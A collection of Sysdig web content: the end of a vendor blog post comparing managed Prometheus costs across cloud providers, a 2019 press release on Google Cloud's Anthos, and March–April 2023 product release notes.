TS calculatorAWS First ~44,800/22,400/7,500 TSAWS Next ~933,393 TSGCP First ~1,120,071/ 560,035/186,678 TSGCP Next ~746,714 TSAzure – any number of TSGrafana Labs & SysdigQSPDiskTOTAL
AWS (60s)$180.00$1,184.70$578.17$141.52$2,084.38
AWS (30s)$180.00$2,439.40$578.17$141.52$3,339.08
AWS (10s)$180.00$7,458.20$578.17$141.52$8,357.88
GCP (60s)$5,377.28$5,377.28
GCP (30s)$7,500.00$2,603.65$10,103.65
GCP (10s)$7,500.00$19,810.96$27,310.96
Azure (60s)$573.58$578.17$1,151.74
Azure (30s)$1,147.15$578.17$1,725.32
Azure (10s)$3,441.46$578.17$4,019.63
Grafana Labs (60s)$6,563.47$6,563.47
Sysdig (10s)$2,295.21$2,295.21

When comparing managed service for Prometheus costs, be aware of the costs by metric interval sampling. Sysdig’s metric interval sampling is 10 seconds by default, while DIY Prometheus, GCP, and Grafana pull metrics every 60 seconds. Despite collecting 6x more data than some of its competitors, Sysdig is the cheapest option. There are no extra charges for storage or queries samples processing with Sysdig. Bear in mind that these services can dramatically increase your bill, plus the inherent complexity of forecasting QSP numbers, it is something variable that depends on the users’ usage.

Comparing all the managed service for Prometheus prices analyzed in this article under the 10 seconds metrics ingestion scope, you’ll see a huge difference among vendors:

  • AWS: ~$8,357 / month
  • GCP: ~$27,310 / month
  • Azure: ~$4,019 / month
  • Grafana Labs: ~$6,563 / month
  • Sysdig: ~$2,295 / month

Azure is almost 2x more costly than Sysdig, AWS is almost 4x, and GCP is 12x more.

K8s multi-cluster use case

If you skipped the “K8s single cluster” use case, please take a look at the first paragraph of that section. It is key to understand how TS are generated and how volatile and dynamic the numbers can be for every use case.

This time, we’ll analyze costs in a larger scenario. This architecture is made up of 5 K8s clusters, 50 nodes each cluster.

  • Five Kubernetes cluster
  • 50 nodes per cluster

The total number of time series have been calculated under regular load, no stress or high load average peaks. For the sake of simplicity, during the testing cycle we redeployed/scaled down/scaled up a few deployments. That way, we can emulate a real application lifecycle. Following, you’ll find the number of time series generated by this group of K8s clusters by job:

  • kubernetes-apiservers: 368,565 TS
  • kubernetes-pods: 4,131,315 TS
  • kubernetes-nodes-cadvisor: 3,607,086 TS
  • kubernetes-service-endpoints (node exporter + KSM): 2,018,828 TS
  • kubernetes-nodes: 505,992 TS
  • kube-dns: 1,850 TS
  • etcd: 21,995 TS
  • prometheus: 5,340 TS
  • felix_metrics: 20,040 TS
  • kube_controller_metrics: 315 TS
  • Time series TOTAL: 10,681,326

In terms of query processing and user activity, let’s start with the following assumptions:

  • 50 different users accessing Prometheus with their own dashboards and graphs reporting data for their projects.
  • An average of eight graphs querying data per user.
  • The refresh interval for each graph is 10 seconds. Assuming an average of 2h per user and day, it corresponds to 720 queries. 5,760 is the total number of queries per day and user.
  • Data is being shown in a three hour timeframe on average.
  • The highest number of samples processed in this environment for three hours is: 11,535,832,080.
  • We’ll assume 300,000 samples on average per query.
  • Monitoring query processing ~2,628,288,000,000 (1)
  • Alerting query processing ~26,280,000,000,000 (2)

(1) Monitoring query processing has been calculated from: 50 monitoring users * 5,760 queries per day and user * 30 days a month * 300,000 avg samples per query (3h).

(2) Alerting query processing has been calculated from: 2 executions per minute * 200 alerts per cluster * 60 minutes per hour * 730 hours per month * 300,000 avg samples per alerting rule.

Disclaimer: Following, you’ll find a quick calculation of the managed service for Prometheus costs for every vendor. Bear in mind that this is an approximation, and cost may fluctuate depending on the usage of your monitoring platform.

This time, we’ll go straight to the point and calculate the costs for each provider using the price per TS we got from the previous section.

Price comparison

Let’s compare the 10 second metrics ingestion prices for every service.

TS calculatorAWS First ~44,800/22,400/7,500 TSAWS Next ~5,600,358/2,800,179/933,393 TSAWS over 252B samplesGCP First ~1,120,071/ 560,035/186,678 TSGCP Next ~4,480,286/2,240,143/746,714 TSGCP Next ~5,600,358/2,800,179/933,393 TSGCP over 500B samplesAzure – any number of TSGrafana Labs & SysdigQSPDiskTOTAL
AWS (60s)$180.00$8,750.00$3,597.03$2,890.83$1,882.28$17,300.13
AWS (30s)$180.00$8,750.00$11,226.06$2,890.83$1,882.28$24,929.16
AWS (10s)$180.00$8,750.00$41,742.18$2,890.83$1,882.28$55,445.29
GCP (60s)$7,500.00$24,000.00$20,413.30$0.00$51,913.30
GCP (30s)$7,500.00$24,000.00$22,500.00$27,217.73$81,217.73
GCP (10s)$7,500.00$24,000.00$22,500.00$141,653.18$195,653.18
Azure (60s)$7,629.03$2,890.83$10,519.86
Azure (30s)$15,258.06$2,890.83$18,148.89
Azure (10s)$45,774.18$2,890.83$48,665.01
Grafana Labs (60s)$85,589.61$85,589.61
Sysdig (10s)$27,747.10$27,747.10

In summary, these are the costs for every service ingesting ~11 million metrics with a 10 second interval.

  • AWS: ~$55,445/month
  • GCP: ~$195,653/month
  • Azure: ~$48,665/month
  • Grafana Labs: ~$85,589/month
  • Sysdig: ~$27,747/month

For a ~11 million time series volume, Sysdig’s managed service for Prometheus is significantly cheaper than its competitors. GCP is almost 4x more expensive than AWS and Azure. Grafana Labs increased the cost significantly, being the second most expensive option. In comparison, Sysdig offers the most cost-effective solution.

Sysdig’s managed service for Prometheus benefits

Sysdig’s managed service for Prometheus stands out as the most affordable option on the market, with significant cost savings compared to other cloud providers such as GCP or AWS.

If you are a OSS Prometheus user looking to delegate your Prometheus metrics ingestion and management, you’ll benefit from huge cost savings. Sysdig’s managed service for Prometheus can help you reduce operation costs by taking care of metrics maintenance, scalability, storage, performance, and issue resolution.

If you are already processing and delegating your metrics to a managed Prometheus provider, keep in mind that you can still reduce your costs and even obtain more features for less. Query Sample Processing (QSP) charges can be particularly tricky to calculate, as they depend on many various factors such as the number of concurrent users, graphs, dashboards, interval refresh, infrastructure size, etc.

Sysdig’s agent ingestion interval time is set to 10 seconds by default, whereas others opt for longer intervals up to 60 seconds. Reducing this interval can negatively impact performance and reliability in some cases, resulting in a poor user experience. By choosing Sysdig’s managed service for Prometheus, you can benefit from shorter metrics ingestion time intervals without sacrificing performance, stability, and reliability, all at a lower price!

When it comes to querying and analyzing your historical data, performance is key. A managed service for Prometheus not able to give your data in a timely manner is not operational and can cause a lot of harm. Sysdig Monitor rolls up historical data over time. This is a key feature(1) that makes Sysdig Monitor do QSP way faster than its competitors.

Apart from including free of charge KSM, node exporter, and cAdvisor metrics, as well as all the metrics collected by Sysdig, including your own custom metrics and platform metrics, you can benefit from the metric enrichment Sysdig brings out of the box. With Sysdig, your Prometheus metrics now gain cloud and Kubernetes context.

Sysdig is much more than a monitoring tool to ingest and store metrics, and analyze your data. Metrics enrichment, eBPF instrumentation, Sysdig Advisor for troubleshooting, Cost Advisor for reducing your K8s and cloud costs, out-of-the-box dashboards, alerts, and integrations, are some of the benefits that Sysdig Monitor brings. Check out this article and discover these features and much more!.

(1) If you want to customize how Sysdig Monitor rolls up your data, please reach out to Sysdig support representatives.

Cut operational and infrastructure related costs

There are other costs associated with Prometheus monitoring worth mentioning. Prometheus metrics cost, the number of time series you manage, and QSP volume are not the only topics that can save you money. A managed service for Prometheus will take most of your burden off by ingesting and processing your Prometheus metrics automatically, and will make all your data available for you.

Businesses may struggle maintaining, escalating, and supporting their Prometheus monitoring infrastructure. This task can be challenging and painful, especially when cardinality explosion comes into play. Time series start to grow exponentially causing serious troubles with stability, scalability, and costs.

There’s no need to worry anymore about whether your monitoring infrastructure is well sized, if you can scale your environment up in a timely manner, or that issue that is causing a big headache that prevents your organization from consuming your metrics. Relying on Sysdig Monitor to ingest, process, and manage your Prometheus metrics and your observability platform can help you dramatically reduce your operational and infrastructure costs.

In terms of Kubernetes and cloud costs, Sysdig can do much more to help you with cutting costs. Sysdig’s Cost Advisor is a tool included in Sysdig Monitor that helps you identify in which areas you are overspending. You can drill down through your whole infrastructure, get granular information, and finally reduce your wasted spending by rightsizing your workloads based on Sysdig’s recommendations. Do you want to learn more? Check how Cost Advisor can help you to reduce your wasted spending by 40% on average!

Conclusion

While the vendors analyzed in this article offer similar managed services for Prometheus, their associated costs may vary. Some vendors also charge for QSP and storage, which can increase your bill exponentially, making it difficult to limit and control costs since they are tied to usage. The more users query, inspect and monitor your data, the higher your bill will be.

Sysdig’s managed service for Prometheus is significantly cheaper than its competitors, even when ingesting metrics every 10 seconds. QSP and storage are included in the price, so there are no surprises when the bill arrives.

To learn more about how to reduce costs with Sysdig’s managed service for Prometheus, visit the Sysdig Monitor trial page and request a 30-day free account. You’ll be up and running in minutes!

The post How Much Does Your Managed Service for Prometheus Cost? appeared first on Sysdig.

]]>
Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP https://sysdig.com/resources/webinars/not-your-parents-cloud-security-real-time-cloud-threat-detection-for-gcp/ Tue, 25 Oct 2022 17:00:42 +0000 https://sysdig.com/?p=54182&post_type=sd-webinars&preview_id=54182 Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP

The post Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP appeared first on Sysdig.

]]>
The post Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP appeared first on Sysdig.

]]>
5 Steps to Securing GCP Cloud Infrastructure https://sysdig.com/resources/guides/5-steps-to-securing-gcp-cloud-infrastructure/ Fri, 24 Feb 2023 09:10:48 +0000 https://sysdig.com/?post_type=sd-guides&p=47295 Securing GCP Cloud Infrastructure

The post 5 Steps to Securing GCP Cloud Infrastructure appeared first on Sysdig.

]]>
The post 5 Steps to Securing GCP Cloud Infrastructure appeared first on Sysdig.

]]>
Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. https://sysdig.com/press-releases/google-clouds-anthos/ Tue, 09 Apr 2019 16:39:27 +0000 https://sysdig.com/?post_type=sd-press-releases&p=15385 […] Kubernetes visibility and security with Anthos as an early access partner and introduces cloud-native platform in GCP Marketplace. April 9, 2019.

The post Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. appeared first on Sysdig.

]]>
Sysdig supports multi-cloud Kubernetes security with Anthos as an early access partner; Company also introduces its cloud-native visibility and security platform in GCP Marketplace for all customers


SAN FRANCISCO, Google Cloud Next ‘19 — April 9, 2019 — Sysdig, Inc. , a cloud-native visibility and security company, today announced at Google Cloud Next ‘19 support for Google Cloud’s Anthos as a launch partner . The company also announced that its commercial solutions, including its Visibility and Security Platform (VSP) 2.0 introduced today, along with the company’s open source project Falco, are now featured on the Google Cloud Platform (GCP) Marketplace . Enterprises considering adoption of a multi-cloud strategy based on Google Kubernetes Engine (GKE) and Anthos can now more easily benefit from Sysdig’s unified view of risk, health, and performance for their cloud-native environments. Enterprises now have the ability to easily get started with Sysdig on the GCP Marketplace to take advantage of the deep visibility and security Sysdig provides.

“Whether enterprises are running microservices in Google Cloud, the private cloud or both, Sysdig has unlocked the data needed to address the essential use cases of running Kubernetes in production. We do this while reducing the instrumentation tax that enterprises are used to paying for safety and security,” said Apurva Davé, chief marketing officer at Sysdig. “As enterprises continue to adopt cloud-native architectures, we give them the tools they need to consistently operate secure and reliable containers across clouds.”

Google Cloud’s Anthos + Sysdig
Anthos, a managed Kubernetes offering that runs inside a customer’s data center and in the public cloud of their choice, was first announced last year as GKE On-Prem and was made generally available today at Next ‘19. Anthos enables enterprises to run and manage workloads across multiple clusters, clouds, and hardware — including managing environments that mix public clouds and on-premises hardware. Anthos is a multi- and hybrid-cloud approach that provides enterprises with a unified, single pane of glass view for managing clusters and ensuring consistency across different environments.

As a launch partner for Google Cloud’s Anthos, Sysdig has collaborated closely with Google Cloud to test and validate this new approach and ensure a smooth deployment of Sysdig’s visibility, security, and forensics technologies across multiple environments.

“With Google Cloud’s Anthos, we enable organizations to transition to the cloud on their own terms and operate in the environments that work for them. To remain competitive and deliver reliable software, organizations need easy access to trusted, tested, and portable applications that can run across their entire infrastructure. Through our work with Sysdig, enterprises can simplify adoption of container-based infrastructure no matter what environment they operate in — on-premises or in the public cloud ,” said Adam Glick, product marketing lead, modern infrastructure at Google.

Sysdig Visibility and Security Platform and Google Cloud’s Anthos User Benefits:
  • A consistent multi-cloud environment. The combination of Anthos and Sysdig gives enterprises the confidence to know that they can run secure, reliable cloud-native applications in a multi-cloud environment with the same tools, same processes, and the same levels of performance and protection.
  • More data, more collaboration equals faster time to production: By integrating Anthos with container visibility, compliance, and run-time security from Sysdig, DevOps can deploy faster, with lower risk. Sysdig provides enterprises with the first unified view of risk, health, and performance across their entire cloud-native infrastructure. This gives DevOps teams, security teams, and service owners access to more data and a single place to validate the operational status of the software and infrastructure that they manage, but at the massive scale that enterprises require.
  • Auto service discovery: As soon as the Sysdig agent is installed, it leverages GKE and other orchestrators to automatically profile and discover infrastructure, applications, containers, metrics, and events, meaning no plugins are needed to get started. Sysdig automatically ingests, consolidates, and enriches data with context from cloud services and other orchestration tools.
  • Faster incident resolution: Adaptive alerts provide proactive notification of anomalies, intrusions, and security violations. Through observing system calls, Sysdig provides deeper container visibility that can be used to detect, alert, and block suspicious activity before it impacts operations.
  • Simplified compliance: Sysdig automatically scans hosts, containers, and microservices for compliance based on Center for Internet Security (CIS) configurations or against custom benchmarks. This helps ease the pain of measuring and enforcing compliance.

Sysdig and Falco Join the GCP Marketplace
The GCP Marketplace gives enterprises a place to browse, compare, and deploy reliable and secure solutions that are compatible with their Google Cloud environments and production ready. Sysdig has joined the Kubernetes Applications section of the GCP Marketplace, which is focused on technologies that address the unique challenges of Kubernetes environments . By joining, Sysdig makes it easier for enterprises to compare the Sysdig platform to single-focus products — purely security, APM or monitoring tools — and realize the value of the combined Sysdig visibility, security, and forensics solutions. Enterprises can now install the Sysdig agent in their cluster directly from the GCP Marketplace, making it easier for them to get started.

Falco, the open source runtime security project from Sysdig, has also joined the GCP Marketplace. Falco continuously monitors containers, applications, hosts, and network activity, alerting on abnormal behavior. It was recently added as a Cloud Native Computing Foundation® Sandbox project.

What Sysdig and Google Partners are Saying:
Arctiq Inc. is a Toronto-based solution provider focused on helping clients modernize their approach to IT delivery. As a Sysdig partner and a Google Cloud Premier Partner, Arctiq has a proven track record delivering modern solutions at scale, faster, and more securely.

“We have had great success pairing Google Kubernetes Engine with Sysdig to help our clients get the visibility they need to successfully run container-based services. We’re glad to see the expanding Sysdig and Google Cloud partnership around the GCP Marketplace and Anthos. We expect these advances to make it even easier for our customers to work with the combined solutions,” said Mike Morrison, partner at Arctiq.

In a separate announcement today, Sysdig shared its vision for a data-first approach to reliable and secure cloud applications in a multi-cloud world. VSP 2.0 provides enterprises with the first and only unified view of the risk, health, and performance of their cloud-native environments.

Availability and pricing
Sysdig is available now to Anthos users, and both the Sysdig agent and Falco are available on GCP Marketplace.

Where to see Sysdig VSP in action
Please visit us at Next ‘19 at booth S1715 to learn more about the VSP 2.0. Also join us during our Cloud Field Day live stream presentation on Wednesday, April 10 from 2 – 3:30 p.m. PT.

Additional information

Media Contact

Amanda McKinney, 280blue, Inc.
amanda@280blue.com

The post Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. appeared first on Sysdig.

]]>
What’s New in Sysdig – March & April 2023 https://sysdig.com/blog/whats-new-in-sysdig-march-and-april-2023/ Thu, 27 Apr 2023 18:00:00 +0000 https://sysdig.com/?p=71236 […] Sysdig platform coverage to new environments by adding support for GCP metrics on Sysdig Monitor. Also, we extended our new […]

The post What’s New in Sysdig – March & April 2023 appeared first on Sysdig.

]]>
“What’s New in Sysdig” is back with the March and April 2023 edition! Happy International Women’s Day! Happy St. Patrick’s Day! Ramadan Mubarak! Happy Easter! And we hope you had an excellent Kubecon in Amsterdam! We are Gonzalo Rocamador, Enterprise Sales Engineer based in Spain, and Parthi Sriivasan, Sr. Customer Solution Architect, and we are excited to share with you the latest feature releases from Sysdig.

This month, Sysdig Secure’s Container Registry scanning functionality became generally available for all users. This functionality provides an added layer of security between the pipeline and runtime scanning stages. On Sysdig Monitor, we introduced a feature to automatically translate Metrics alerts in form-based query to PromQL. This allows you to choose between the convenience of form and the flexibility of PromQL.

We are excited to announce the availability of the Sysdig 6.0 on-premises release. This release brings several product offerings that are available on the Sysdig SaaS platform for the Monitor & Secure product.

In March, we expanded the Sysdig platform coverage to new environments by adding support for GCP metrics on Sysdig Monitor. Also, we extended our new security posture module to cover Openshift platforms. Further, we introduced a new inventory feature as a tech preview. This feature provides a consolidated view of all resources across Infrastructure as a Code, containers, cloud, and hosts, along with their security posture and configuration.

Stay tuned for more updates from Sysdig and let’s get started!

Sysdig Monitor

GCP Metrics are Now Natively Supported by Sysdig Monitor

We are happy to announce the general availability of GCP metrics support in Sysdig Monitor. Just connect your Google Cloud account, enable the integration, and benefit from out-of-the-box GCP monitoring.

Initial support includes integrations for GCP MySQL, PostgreSQL, SQL Server, Compute Engine, and Memorystore for Redis. Customers can leverage out-of-the-box dashboards and alerts for these services. Additionally, metrics are collected for all GCP services – so, if there’s not a set of dashboards/alerts for a service, it’s simple to create them.

More information is available in the documentation and in our recent blog post: https://sysdig.com/blog/native-support-gcp-monitor/

What’s New - March and April 2023_3

How customers are using this:

Thanks to its multi-cloud integration model, Sysdig customers can easily monitor AWS, Azure, and GCP workloads and services from a single pane of glass.

Customers can now correlate their own applications, services, and Prometheus metrics with Kubernetes and cloud context, without any extra effort.

Forget about taking care of exporters or any other service to pull your GCP metrics. Everything is handled by Sysdig Monitor. The same way Sysdig Monitor works with third-party applications and services, it offers a completely smooth experience for GCP integration.

Translate Metrics Alerts to PromQL

Metric alerts configured in form-based query can now be automatically translated to PromQL. This allows users to choose between the convenience of form and the flexibility of PromQL. Translation to PromQL also allows users to define more complex and composite queries that are not possible with Form. For more information, see Translate to PromQL.

Monitoring Integrations

Added the following integrations:

  • k8s-cAdvisor
  • Microsoft IIS
  • Microsoft SQL Server Exporter
  • KNative (integration with jobs only)
  • Added the following:
    • Zone label to the GCP integrations
    • Security updates to the UBI image of exporters
    • New ports and certificate path to the Etcd default job

IBM Cloud Integrations

The IBM cloud Integrations add new easy-to-use dashboards, focused on relevant metrics, and support specific alerts for these integrations.

  • IBM Cloud PostgreSQL
  • IBM Cloud MongoDB

Dashboards and Alerts

Introduced the following improvements and changes to dashboards & alerts:

  • Improved the CoreDNS integration dashboard and alerts with latency metrics
  • Deprecated the Linux Memory Usage dashboard
  • Moved the Linux Host Integration dashboard to the Host Infrastructure category
  • Improved the Memory Usage dashboard for Linux VMs
  • Removed the _AWS CloudWatch: DynamoDB Overview By Operation dashboard

For more information, see Integration Library.

Sysdig Secure

Container Registry Scanning is Generally Available

Sysdig Secure is excited to announce the general availability of the Image Registry Scanning functionality as part of our Vulnerability Management suite.

What’s New - March and April 2023_2

Get Hands-On! Do you want to practice the new Sysdig registry scanner in a real environment?

How customers are using this:

  • Registries are a fundamental stage in the life cycle of container images. This feature provides an added layer of security between the pipeline and runtime stages, allowing you to gain complete visibility into potential vulnerabilities before deploying to production.
  • Container registries accumulate large amounts of images from developers and sometimes from third-party vendors. Some of these images are obsolete or no longer suitable for runtime, and registry scanning provides the necessary security layer to avoid degradation of the security posture.
  • Once the container registry is instrumented and analyzed, users can generate registry reports to extract, forward, and post-process the vulnerability information.

Supported vendors:

  • AWS Elastic Container Registry (ECR) – Single Registry and Organizational
  • JFrog Artifactory – SaaS and On-Premises
  • Azure Container Registry (ACR) – Single Registry
  • IBM Container Registry (ICR)
  • Quay.io – SaaS
  • Harbor

Risk Scores Explanation Enhanced in CIEM

Understand a breakdown of your CIEM Risk Scores with Overview explanations.

How customers are using this:

  • Within the Posture tab, you’ll find different Identity and Access resources with Risk Scores.
  • Select an entity from the list in the table and a drawer appears providing a detailed breakdown of the entity’s risk score. This includes the specific attributes and permissions that have contributed to it. Learn more about how risk scores are calculated.

Git Scope for Zones

We have extended the flexibility of Zones for Posture to also support Git integrations and IaC (Infrastructure as Code) scanning.

How customers are using this:

With the introduction of Git scope for zones, users can include the new Git scope types as part of the zone definition and configure the policies that apply for that zone.

What’s New - March and April 2023_7

Inventory Released as Tech Preview

We are happy to announce that Inventory is available to all customers as a new top-level menu item.

What’s New - March and April 2023_5

How customers are using this:

Sysdig users can gain visibility into resources across the cloud (GCP, Azure, and AWS) and Kubernetes environments from a single view. With the current release of Inventory, Sysdig users can achieve goals such as:

  • View all resources across their cloud environment(s)
  • Protect all resources and mitigate blind spots
  • Know all current resources in their infrastructure that share properties
  • Know which resources belong to a business unit
  • Review posture violations for a resource and take action (remediate or handle risk)

Support for CIS Security Control v8

The CIS critical Security Controls (CIS Controls) are a prioritized set of Safeguards to mitigate the most prevalent cyber-attacks against systems and networks. They are mapped to and referenced by multiple legal, regulatory, and policy frameworks. CIS Controls v8 (latest) has been enhanced to keep up with modern systems and software. Movement to cloud-based computing, virtualization, mobility, outsourcing, Work-from-Home, and changing attacker tactics prompted the update and supports enterprise security as they move to both fully cloud and hybrid environments.

This policy, with 1,316 controls classified into 18 requirement groups, is now available as part of Sysdig’s posture offering.

Support for OWASP Kubernetes Top 10

The OWASP Kubernetes Top 10 is aimed at helping security practitioners, system administrators, and software developers prioritize risks around the Kubernetes ecosystem. The Top 10 is a prioritized list of these risks. This policy, containing 344 controls classified into 10 requirements, is now available in Secure.

More information about this policy can be found in OWASP Kubernetes Top 10.

Updated CIS AWS Foundations Benchmark to v1.5.0

We are happy to announce the update of the existing CIS Amazon Web Service Foundations Benchmark policy to its latest version at the time (v1.5.0). This new version includes a new resource type (EFS File System) for greater coverage, as well as new controls for the Amazon Elastic File System (EFS) and Amazon Relational Database Service (RDS) services. The total number of controls in this new update has been raised up to 79.

Helm Chart 1.5.80+ and Cli-Scanner 1.3.6 Released

  • RELEASE suffix in Java packages leading to false negatives resolved
    Specific Java packages containing a .RELEASE suffix were not correctly matched against their existing vulnerabilities, for example:
    https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-web/1.2.2.RELEASE
    was not correctly parsed and matched against the relevant vulnerabilities. This case is particularly common for spring-boot libraries.
    This fix will remove false negatives, for example, uncover real vulnerabilities that were present in those packages but not previously listed.
  • IMPROVEMENTS display full path for jar-in-jar libraries:
    When a jar library is found inside another jar container, Sysdig will display the absolute and relative path inside the jar, using the colon as separator:

Before: /SpringHelloWorld-0.0.1.jar

After: /SpringHelloWorld-0.0.1.jar:BOOT-INF/lib/spring-core-5.3.16.jar

See Vulnerabilities|Pipeline for details on downloading and running the cli-scanner.

Legacy Inline Scanner v 2.4.21 Released

  • Updated anchore to 0.8.1-57 (March 2023)
  • Support OCI manifest list: parse and scan images built with attestation storage
  • Vulns fixes for the following High severity CVEs:
  • CVE-2022-41723
  • CVE-2022-47629
  • CVE-2023-24329
  • CVE-2023-25577

Posture now supports Red Hat OpenShift Container Platform (OCP4)

Sysdig is pleased to announce the support for the OpenShift platform. The CIS Red Hat OpenShift Container Platform Benchmark policy is now available, with 181 controls (145 are exclusive to OpenShift), using a new Cluster resource type which is of paramount importance in OCP4 due to the nature of the platform.

What’s New - March and April 2023_6
What’s New - March and April 2023_8

Improved Search of Posture Controls

Our ~1,000 Posture Controls are now easier to find, by their Name, Description, Severity, Type, and Target platform or distribution, anywhere you are looking for them:

  • Filtering for controls in the Control library
  • Filtering in the Policies library, including while editing your custom policy

    We also added enhanced visibility of control targets by showing the supported platform and distributions on each control.

Support for Posture on OCP, IKS, and MKE

We have added Posture support for new Kubernetes distributions:

  • Support for Red Hat OpenShift Container Platform 4 (OCP4):
    • CIS Red Hat OpenShift Container Platform Benchmark policy
  • Support for IBM Cloud Kubernetes Service (IKS):
    • Sysdig IBM Cloud Kubernetes Service (IKS) Benchmark policy
  • Support for Mirantis Kubernetes Engine (MKE):
    • Sysdig Mirantis Kubernetes Engine (MKE) Benchmark policy

New Out-of-the-Box Security Posture Policies Released 

  • CIS Kubernetes V1.24 Benchmark

A new Posture policy has been released following the CIS Kubernetes V1.24 Benchmark. This policy provides prescriptive guidance for establishing a secure configuration posture for Kubernetes 1.24, and includes 13 new controls.

  • CIS Critical Security Controls v8

The CIS Critical Security Controls (CIS Controls) are a prioritized set of Safeguards to mitigate the most prevalent cyber-attacks against systems and networks. They are mapped to and referenced by multiple legal, regulatory, and policy frameworks. CIS Controls v8 (latest) has been enhanced to keep up with modern systems and software. Movement to cloud-based computing, virtualization, mobility, outsourcing, work-from-home, and changing attacker tactics prompted the update and supports an enterprise’s security as they move to both fully cloud and hybrid environments.

This policy, with 1,316 controls classified into 18 requirement groups, is now available as part of Sysdig’s posture offering.

  • OWASP Kubernetes Top 10

The OWASP Kubernetes Top 10 is aimed at helping security practitioners, system administrators, and software developers prioritize risks around the Kubernetes ecosystem. The Top 10 is a prioritized list of these risks. This policy, containing 344 controls classified into 10 requirements, is now available in Secure.

  • CIS Amazon Web Services Foundations Benchmark v1.5.0 (latest)

We are happy to announce the update of the existing CIS Amazon Web Services Foundations Benchmark policy to its latest version at the time (v1.5.0). This new version includes a new resource type (EFS File System) for greater coverage, as well as new controls for the Amazon Elastic File System (EFS) and Amazon Relational Database Service (RDS) services. The total number of controls in this new update has been raised up to 79.

The New CSPM Experience is Now Available in All IBM Cloud Production Environments

Sysdig is pleased to announce the GA release of the new CSPM Compliance in all IBM cloud production environments, Focus your compliance results on your most important environments and applications!

New features introduced:

  • A new compliance page is introduced, ordered by your Zones!
  • CSPM Zones Management
    • Define scopes for the resources you want to evaluate
    • Apply a policy to your zone to add it to the compliance page
  • 50+ Risk and Compliance Policies included

To get to know our path from detection to remediation, risk acceptance, zones management, installation, and migration guidelines, please review the documentation.

New Page for Privacy Settings

A new page has been added in Administration|Settings to adjust Privacy settings for Sysdig Secure.

New Filter and Grouping for Threat Detection Policies

This release enhances the Threat Detection policies by showing the policies in a grouped manner and the ability to filter by policy type.

Additionally, badges on the list now alert when rules have been added or updated in managed policies.

New Filter and Grouping for Rules Library

This release enhances the Threat Detection rules library by showing the rules in a grouped manner, as well as adding the ability to view only custom rules.

Cloud Account Compute Resource Usage Reporting

In this release, we have added Compute Resource usage reporting to the subscription page.

What’s New - March and April 2023_4

Sysdig Agents

Agent Updates

The latest Sysdig Agent release is v12.13.0. Below is a diff of updates since v12.11.0, which we covered in our February update.

Feature enhancements

Kernel Support

Supports kernel version v6.2.0 and above.

Version Upgrade for Library Benchmark

Library Benchmark has been updated from version 1.5.0 to 1.7.1.

Collect PodDisruptionBudget Metrics

Added support for collecting Kubernetes PodDisruptionBudget metrics.

Send Start and Ready Time for Pods

Added support for sending start time and ready time for a pod when configured. For more information, see Customize KSM Collection.

Optimize collecting runtime rules

The Falco rules optimizer has been enabled by default. This performs optimizations on the collection of runtime rules in conjunction with system call events to help reduce agent CPU usage.

Defect Fixes

Agent No Longer Fails When Customer ID Is Unspecified

Fixed a problem where an agent, which is stuck in a restart loop due to lack of configured customer ID, would fail to recognize when the configuration was subsequently updated to provide a customer ID.

Agent Retrieves JMX Metrics as Expected

Sysdig agent no longer generates heap dumps while fetching JMX metrics.

Podman containers running as unprivileged systemd services are detected correctly

Container image metadata is reported correctly with Podman 4.x

The following vulnerabilities have been fixed:

CVE-2022-40897 and CVE-2022-41723

Fix proxy connection

Fixed an issue where proxy connection could fail if used in conjunction with agent console.

Agentless Updates

v4.0.0 is still the latest release.

SDK, CLI, and Tools

Sysdig CLI

v0.7.14 is still the latest release. The instructions on how to use the tool and the release notes from previous versions are available at the following link:

https://sysdiglabs.github.io/sysdig-platform-cli/

Python SDK

v0.16.4 is still the latest release.

https://github.com/sysdiglabs/sysdig-sdk-python/releases/tag/v0.16.4

Terraform Provider

There is a new release v0.7.4.

Documentation: https://registry.terraform.io/providers/sysdiglabs/sysdig/latest/docs

GitHub link: https://github.com/sysdiglabs/terraform-provider-sysdig/releases/tag/v0.7.4

Terraform modules

  • AWS Sysdig Secure for Cloud has been updated to v0.10.8.
  • GCP Sysdig Secure for Cloud remains unchanged at v0.9.9.
  • Azure Sysdig Secure for Cloud has been updated to v0.9.5.

Note: Please check release notes for potential breaking changes.

Falco VSCode Extension

v0.1.0 is still the latest release.

https://github.com/sysdiglabs/vscode-falco/releases/tag/v0.1.0

Sysdig Cloud Connector

AWS Sysdig Secure for Cloud has been updated to v0.16.34.

Admission Controller

Sysdig Admission Controller remains unchanged at v3.9.16.

Documentation: https://docs.sysdig.com/en/docs/installation/admission-controller-installation/

Runtime Vulnerability Scanner

The new vuln-runtime-scanner has been updated to v1.4.10.

Documentation: https://docs.sysdig.com/en/docs/sysdig-secure/vulnerabilities/runtime

Sysdig CLI Scanner

Sysdig CLI Scanner has been updated to v1.3.8.

Documentation: https://docs.sysdig.com/en/docs/sysdig-secure/vulnerabilities/pipeline/

Sysdig Secure Online Scan for GitHub Actions

The latest release has been updated to v3.5.0.

https://github.com/marketplace/actions/sysdig-secure-inline-scan

Sysdig Secure Jenkins Plugin

Sysdig Secure Jenkins Plugin has been updated to v2.2.9.

https://plugins.jenkins.io/sysdig-secure/

Prometheus Integrations

Integrations:

  • Fix: Add new zone label to GCP integrations
  • Feat: New integration – Microsoft IIS
  • Feat: New integration – Microsoft SQL Server Exporter
  • Sec: Security updates on exporters UBI images (2023-02)
  • Sec: Update helm chart with new image version
  • Doc: Correct TS consumption for Istio integration in our documentation
  • OSS: Create a PR in the Windows exporter official repo with a list of fixes

Dashboards and alerts:

  • Fix: Linux Host Integration should be listed in the Host Infrastructure category
  • Feat: Improve Memory Usage dashboard for Linux VMs and maybe join with Host Resource Usage
  • Fix: Missing parenthesis in PromQL expression in GCP PostgreSQL
  • Fix: Update Time series dashboard with new metric name
  • Fix: Kubernetes Alert for nodes down lack comparison with zero
  • Fix: Remove the dashboard “_AWS CloudWatch: DynamoDB Overview By Operation”
  • Fix: Windows dashboards scope to include job label
  • Refactor: Convert existing AWS CloudWatch templates to Prometheus format

Sysdig On-premise

New release for Sysdig On-premises with version 6.0

Upgrade Process

